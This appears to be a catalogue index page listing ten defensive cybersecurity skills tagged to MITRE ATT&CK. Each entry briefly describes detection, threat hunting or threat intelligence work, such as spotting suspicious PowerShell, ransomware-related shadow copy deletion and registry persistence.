mitre-attack▌
62 indexed skills · max 10 per page
detecting-suspicious-powershell-execution
mukul975/Anthropic-Cybersecurity-Skills · detecting-suspicious-powershell-execution
Detect suspicious PowerShell execution patterns including encoded commands, download cradles, AMSI bypass attempts, and constrained language mode evasion.
tracking-threat-actor-infrastructure
mukul975/Anthropic-Cybersecurity-Skills · tracking-threat-actor-infrastructure
Threat actor infrastructure tracking involves monitoring and mapping adversary-controlled assets including command-and-control (C2) servers, phishing domains, exploit kit hosts, bulletproof hosting, a
implementing-threat-modeling-with-mitre-attack
mukul975/Anthropic-Cybersecurity-Skills · implementing-threat-modeling-with-mitre-attack
Implements threat modeling using the MITRE ATT&CK framework to map adversary TTPs against organizational assets, assess detection coverage gaps, and prioritize defensive investments. Use when SOC teams need to align detection engineering with threat landscape, conduct threat assessments for new environments, or justify security tool procurement.
hunting-for-spearphishing-indicators
mukul975/Anthropic-Cybersecurity-Skills · hunting-for-spearphishing-indicators
Hunt for spearphishing campaign indicators across email logs, endpoint telemetry, and network data to detect targeted email attacks.
hunting-for-registry-persistence-mechanisms
mukul975/Anthropic-Cybersecurity-Skills · hunting-for-registry-persistence-mechanisms
Hunt for registry-based persistence mechanisms including Run keys, Winlogon modifications, IFEO injection, and COM hijacking in Windows environments.
hunting-for-shadow-copy-deletion
mukul975/Anthropic-Cybersecurity-Skills · hunting-for-shadow-copy-deletion
Hunt for Volume Shadow Copy deletion activity that indicates ransomware preparation or anti-forensics by monitoring vssadmin, wmic, and PowerShell shadow copy commands.
detecting-email-forwarding-rules-attack
mukul975/Anthropic-Cybersecurity-Skills · detecting-email-forwarding-rules-attack
Detect malicious email forwarding rules created by adversaries to maintain persistent access to email communications for intelligence collection and BEC attacks.
collecting-threat-intelligence-with-misp
mukul975/Anthropic-Cybersecurity-Skills · collecting-threat-intelligence-with-misp
MISP (Malware Information Sharing Platform) is an open-source threat intelligence platform for gathering, sharing, storing, and correlating Indicators of Compromise (IOCs) of targeted attacks, threat
hunting-for-registry-run-key-persistence
mukul975/Anthropic-Cybersecurity-Skills · hunting-for-registry-run-key-persistence
Detect MITRE ATT&CK T1547.001 registry Run key persistence by analyzing Sysmon Event ID 13 logs and registry queries to identify malicious auto-start entries.
building-detection-rules-with-sigma
mukul975/Anthropic-Cybersecurity-Skills · building-detection-rules-with-sigma
Builds vendor-agnostic detection rules using the Sigma rule format for threat detection across SIEM platforms including Splunk, Elastic, and Microsoft Sentinel. Use when creating portable detection logic from threat intelligence, mapping rules to MITRE ATT&CK techniques, or converting community Sigma rules into platform-specific queries using sigmac or pySigma backends.